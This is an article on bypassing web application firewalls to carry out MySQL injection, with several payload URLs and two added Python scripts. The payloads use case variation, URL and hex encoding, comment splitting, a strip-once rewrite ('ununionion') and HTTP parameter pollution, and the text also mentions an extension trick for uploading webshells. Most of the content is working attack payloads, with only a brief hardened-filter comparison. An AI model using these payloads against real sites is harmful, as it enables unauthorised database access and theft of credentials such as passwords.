Let's see how the experts break through WAF defenses (1)

Source: Internet
Author: User
Tags: mysql injection

Once all the system-level security defenses are in place, what remains is defense at the web application layer: SQL injection, cross-site scripting and the like. This is also what troubles most webmasters. A few days ago I wrote "Security treasure architecture technology speculation and advanced network security defense", which explains the simplest high-performance defense method; adapted slightly to your own situation, it handles most attacks. But does that settle everything?

First, let's review how the experts out there have been breaking through WAF defenses:

1. Case variation bypass

Everyone is familiar with this one, and it works remarkably well against some truly poor WAFs: if union is intercepted, UnIoN (or any other mix of upper and lower case) is used instead, because the filter compares case-sensitively while MySQL keywords are case-insensitive.

2. Simple encoding bypass

If the WAF detects a keyword, we make the keyword undetectable. For example, if union is detected, we send %55, the URL (hex) encoding of U, in place of the literal U, so union is written as %55nION. Combined with case variation this bypasses some WAFs; you can replace one or several of the letters at will. The trick works when the WAF matches the raw, undecoded query string while the application decodes it before the value reaches the database.

Likewise, in MySQL injection, a table name used as a string value (for example when querying information_schema) or the file name passed to load_file() can be written as a hexadecimal string literal (MySQL accepts 0x... wherever a quoted string is expected), which gets past WAFs that look for the literal name or for quote characters.

3. Comment bypass

This case is rare: the WAF neutralizes only the one dangerous statement it matches and does not block the whole request.

/?id=1+union+select+1,2,3/*union+select+1,2,3*/

As you can see, all we do is place a copy of the sensitive words inside a comment; note that a /* has to be added in front of it.

4. Separation and rewrite bypass

The example above applies when the WAF uses regular expressions and looks for the sensitive words anywhere in the request, no matter where they appear; whatever words it finds, it filters out.

We can separate the sensitive words with comments so that the WAF's regular expression no longer matches while the query result is unaffected:

/?id=1+un/**/ion+se/**/lect+1,2,3--

Be careful where the comment goes: MySQL treats a /**/ comment as whitespace between tokens, so a comment placed between two keywords (union/**/select) is fine, whereas one placed inside a keyword, as in un/**/ion, splits it into two identifiers and breaks the statement. Aim the split at the gap the WAF's pattern relies on, not at the keyword itself.

As for the rewrite bypass, it applies where the WAF filters only once. It works on the same principle as uploading a webshell with the extension .aaspsp: one pass of stripping asp leaves .asp. Here we write something like ununionion; after the filter removes one union, what remains is union and our query executes.

/?id=1+ununionion+select+1,2,3--
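To make the four bypasses above concrete, here is an added example (not code from the original article): two deliberately weak toy filters that behave the way the text describes, a case-sensitive blocker that neither URL-decodes nor understands comments, and a sanitiser that strips union once and forwards the rest. The payloads are constructed from the sections above, mysql_view() is only an approximation of what MySQL ends up parsing, and hardened_blocks() shows that matching on that normalised form, rather than on the raw request, defeats every payload.

```python
"""Toy WAF filters versus the bypass payloads from sections 1 to 4.

Constructed example, not code from the original article.
"""
import re
from urllib.parse import unquote_plus

# Signature of the injection a WAF is trying to catch (applied to normalised text).
UNION_SELECT = re.compile(r"\bunion\s+select\b")

# Weak blocker: case-sensitive, only '+' -> ' ', no %-decoding, no comment handling.
WEAK_PATTERN = re.compile(r"union\s+select")

PAYLOADS = {  # value of the id parameter in each request (constructed)
    "baseline": "1+union+select+1,2,3--",
    "case":     "1+UnIoN+SeLeCt+1,2,3--",        # section 1
    "encoding": "1+%55nION+select+1,2,3--",      # section 2: %55 decodes to 'U'
    "comment":  "1+union/**/select+1,2,3--",     # section 4, separation variant
    "rewrite":  "1+ununionion+select+1,2,3--",   # section 4, rewrite variant
}


def weak_blocker_blocks(raw):
    """Reject the request if the raw query (with '+' read as space) matches."""
    return WEAK_PATTERN.search(raw.replace("+", " ")) is not None


def stripping_waf(raw):
    """Single-pass sanitiser: deletes the first 'union' and forwards the rest."""
    return re.sub("union", "", raw, count=1, flags=re.I)


def mysql_view(raw):
    """Approximate the text MySQL parses: URL-decode, treat /* */ comments as
    whitespace between tokens, fold case, collapse whitespace runs.
    (/*! */ version comments, which MySQL executes, are not special-cased.)"""
    decoded = unquote_plus(raw)
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded, flags=re.S)
    return " ".join(no_comments.lower().split())


def mysql_hex_literal(text):
    """Hex string literal from section 2: 'users' -> 0x7573657273."""
    return "0x" + text.encode().hex()


def is_union_injection(view):
    return UNION_SELECT.search(view) is not None


def bypasses_weak_blocker(raw):
    """Gets past the blocker AND still reads as a union query at the database."""
    return not weak_blocker_blocks(raw) and is_union_injection(mysql_view(raw))


def bypasses_stripper(raw):
    """After one 'union' is stripped, a union query still reaches the database."""
    return is_union_injection(mysql_view(stripping_waf(raw)))


def hardened_blocks(raw):
    """Hardened design: inspect the same normalised text the database will see,
    and block rather than strip, so the rewrite trick has nothing to work on."""
    return is_union_injection(mysql_view(raw))


if __name__ == "__main__":
    for name, raw in PAYLOADS.items():
        print(f"{name:8s} weak-blocker bypass={bypasses_weak_blocker(raw)!s:5s} "
              f"stripper bypass={bypasses_stripper(raw)!s:5s} "
              f"hardened blocks={hardened_blocks(raw)!s:5s} "
              f"db sees: {mysql_view(raw)}")
```

Running it shows the division the text hints at: the case, encoding and comment payloads sail past the blocker because it inspects the raw string, while the rewrite payload only helps against a filter that strips and forwards. The hardened filter blocks the first four; the rewrite payload reaches the database unblocked but as ununionion select, which is not a union query at all.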

5. HTTP parameter pollution (HPP)

Suppose we have the following statement:

/?id=1+union+select+1,2,3+from+users+where+id=1--

We can repeat the id parameter and put the rest of our values in the second copy to get past the WAF; on the server the &id= turns into a comma when the query is built:

/?id=1+union+select+1&id=2,3+from+users+where+id=1--

Joining repeated parameters with a comma is what classic ASP and ASP.NET do with Request.QueryString; PHP's $_GET keeps only the last value, which is why the PHP example below has to use distinct parameter names.

Success here depends on many conditions, in particular on the specific WAF implementation and on how the server stack merges repeated parameters.

An example to illustrate the usage:

/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users--

Working this out in detail depends on how the back-end code builds the query statement.

For example, if the server code is:

$sql = "select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c'];

then we can construct the following injection:

/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--

which the server assembles into:

select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--

The fixed "and b=" and "limit" fragments end up inside comments, so what MySQL executes is effectively "select * from table where a=1 union select 1,pass from users", and no single parameter ever contained "union select". As you can see, this method suits white-box testing; in black-box penetration it is troublesome to use, but you can still try it.
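The HPP section above rests on two server behaviours it only alludes to. The following added example (not code from the original article) re-implements both: PHP's $_GET, where a repeated name keeps the last value, and the classic ASP / ASP.NET Request.QueryString join, where repeated names become "v1,v2". It then concatenates the statement exactly as the page's PHP snippet does and strips the /* */ comments to show what MySQL actually parses. build_sql_single() is an assumed server-side concatenation for the /?id=... requests, which the page does not show; the query strings are the page's own payloads.

```python
"""HPP walk-through for section 5.  Constructed example, not code from the
original article; build_sql_single() is an assumed back end for /?id=...
"""
import re
from urllib.parse import parse_qsl

UNION_SELECT = re.compile(r"union\s+select", re.I)


def parse_php(query):
    """PHP $_GET semantics: the last value of a repeated parameter wins."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        params[key] = value
    return params


def parse_asp(query):
    """Classic ASP / ASP.NET Request.QueryString semantics: repeated parameters
    are joined with ',', which is what turns '&id=' into a comma."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        params[key] = value if key not in params else params[key] + "," + value
    return params


def build_sql_php(params):
    """Mirror of the page's snippet:
    "select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit ".$_GET['c']"""
    return ("select * from table where a=" + params["a"]
            + " and b=" + params["b"]
            + " limit " + params["c"])


def build_sql_single(params):
    """Assumed back end for the /?id=... examples (not shown on the page)."""
    return "select * from users where id=" + params["id"]


def effective_sql(sql):
    """What MySQL parses: a /* */ comment acts as whitespace between tokens.
    (/*! */ version comments, which MySQL executes, are not special-cased.)"""
    return " ".join(re.sub(r"/\*.*?\*/", " ", sql, flags=re.S).split())


def per_parameter_hits(query):
    """Values a WAF that inspects each query-string pair in isolation would flag."""
    return [v for _, v in parse_qsl(query, keep_blank_values=True)
            if UNION_SELECT.search(v)]


if __name__ == "__main__":
    php_q = "a=1+union/*&b=*/select+1,pass/*&c=*/from+users--"
    asp_q = "id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users--"
    for label, built in (("php", build_sql_php(parse_php(php_q))),
                         ("asp", build_sql_single(parse_asp(asp_q)))):
        print(label, "assembled:", built)
        print(label, "executes :", effective_sql(built))
    print("per-parameter WAF hits:", per_parameter_hits(php_q), per_parameter_hits(asp_q))
```

Two practical notes. First, the simple `id=1+union+select+1&id=2,3...` form still leaves "union select" intact inside the first pair, so a WAF that inspects each parameter separately flags it; only the comment-split forms keep every individual value clean, which is the real gain of combining HPP with comments. Second, MySQL only honours -- as a comment when it is followed by whitespace, so in a live URL the trailing -- is normally written --+ (the + decodes to a space) or -- -.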

